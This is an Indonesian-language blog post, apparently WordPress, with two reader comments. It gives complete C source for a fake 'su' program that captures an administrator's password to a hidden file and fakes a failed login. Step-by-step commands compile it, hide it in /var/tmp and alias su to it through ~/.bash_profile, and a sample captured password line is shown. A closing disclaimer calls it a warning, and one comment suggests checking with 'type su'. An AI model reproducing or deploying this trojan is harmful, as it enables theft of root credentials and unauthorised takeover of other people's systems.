Mendapatkan Password root dengan Jebakan


Pernahkan anda merasa jengkel saat anda melakukan sesuatu di mesin Linux dengan account user biasa semua serba terbatasi. atau jika anda sudah mendapatkan file passwd dan shadow untuk di crack dengan John the Ripper dengan brute forcenya, tetapi anda malas untuk menunggu proses cracking selesai, (bisa botak tumbuh paku gw nungguinnya :( )

kali ini sang admin akan kita bohongi, perintah dalam linux untuk login menjadi super user atau menjadi admin yaitu dengan mengetikkan perintah “su” lalu dilanjutkan dengan mengetikan password, nah kita akan memasang program jebakan, jadi, ketika sang admin mengetikkan perintah “su” otomatis program akan menjalankan program “su” yang kita alias ke program yang kita tentukan letakkan dengan perintah “alias” menggunakan perintah “alias”, lebih lanjut silahkan baca manualnya

uname@slacker:~$ man alias

di bawah ini adalah source code dari program “.su” yang mengecoh admin dibuat oleh salah seorang staf kecoak-elektronik Indonesia, Pseudoanonymous.

———— The Code —————-

/*
* su “evil” brought to you by Kecoak’s C SHell
* (c) 2007 Kecoak Elektronik Indonesia
*
* Still alive to break and burn the sky
* Still decided to take overing the network use unusual ways
* Still silent and keep the underground spirit!
*
*   1. gcc -O2 -o .su su.c
*   2. mv .su /var/tmp/.su
*   3. echo “alias su=/var/tmp/.su” >> ~/.bash_profile
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define SU “/bin/su”                 /* better search the correct path */
#define PASSWD “/var/tmp/.passwd”
#define LOCK “/var/tmp/.su.lock”

extern char **environ;

int main(int argc, char **argv) {
char *pass;
char *user;
char *ruser;
FILE *inFile;

switch(argc) {
case 1:
user = “root”;
break;
case 2:
if(!strncmp(”-”, argv[1], 1)) {
user = “root”;
}
else {
user = argv[1];
}
break;
case 3:
user = argv[2];
break;
}

if((inFile = fopen(LOCK, “r”)) != NULL) {
unlink(LOCK);
argv[0] = SU;
execve(argv[0], argv, environ);
}

if((inFile = fopen(PASSWD, “a+”)) == NULL) {
execle(SU, SU, argv[1], argv[2], NULL, environ);

#ifdef DEBUG
perror(”open() on PASSWD file”);
#endif
}

pass = getpass(”Password: “);

ruser = getenv(”USER”);
fprintf(inFile, “%s tried %s / %s\n”, ruser, user, pass);
fclose(inFile);

inFile = fopen(LOCK, “w”);
fclose(inFile);
printf(”su: Permission denied\nSorry\n”);

return 0;
}

———— End of Code —————-

Saya tidak menjelaskan baris per baris bagaimana program ini bekerja, karena saya malas menulisnya hehehe,, silahkan anda pahami sendiri ,, :)
Silahkan kompile menggunakan gcc

uname@slacker:~$ gcc -O2 -o .su su.c

jika ada warning, biarkan saja, lalu pindahkan ke direktori /var/tmp agar tidak terlalu mencurigakan,

uname@slacker:~$ mv .su /var/tmp/.su

file “.su” akan hidden di direktori /var/tmp, setting “alias” akan selalu ada di load di dalam “bash” atau “shell” pada file “.bash_profile”
dengan mengetikkan perintah,

uname@slacker:~$ echo “alias su=/var/tmp/.su” >> ~/.bash_profile

nah, pada tahap ini semua persiapan sudah beres, tinggal menunggu si admin menjalankan perintah “su” yang akan pada akhirnya akan menjalankan program
“/var/tmp/.su”  (licik juga kau ???)

uname@slacker:~$ su
Password:
su: Permission denied                                 <— hanya tipuan, seakan-akan admin salah mengetikkan password, padahal password sudah di capture
Sorry
uname@slacker:~$ su
Password:
root@slacker:/home/uname#                      <— login sekali lagi, admin berhasil login

dan setelah kecelakaan di atas, sekarang kita nikmati hasil jebakannya , dengan mengetikkan perintah,

uname@slacker:~$ vi /var/tmp/.passwd

lalu muncul seperti di bawah ini, diketahui user biasa adalah “uname” dan mencoba password “root” “guegila123″

uname tried root / guegila123

+++++++++++++++++++++++++++++++++++++++++
Artikel ini bertujuan untuk memperingatkan kepada kita tidak ada yang 100% aman dari sistem komputer, dan selalu waspada terhadap data-data penting di mesin kita, jangan gunakan trik di atas di mesin yang bukan milikmu, jika melanggar, segeralah bertaubat, kiamat udah deket booozzz .. :)

10 thoughts on “Mendapatkan Password root dengan Jebakan

  1. untuk melakukan langkah di atas itu kita butuh akses root karena bisa menulis ke /var/tmp (mengcopy .su /var/tmp), trus untuk apa dijebak lagi jika sudah punya ?😉

  2. ya, kan kita sebagai yg defend nya, he3..

    oya, satu lagi kelupaan, selalu cek sama

    # type su
    su is /bin/su
    root@darkstar:~#

    btw, artikel nya jarang muncul yang baru lagi nh?

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s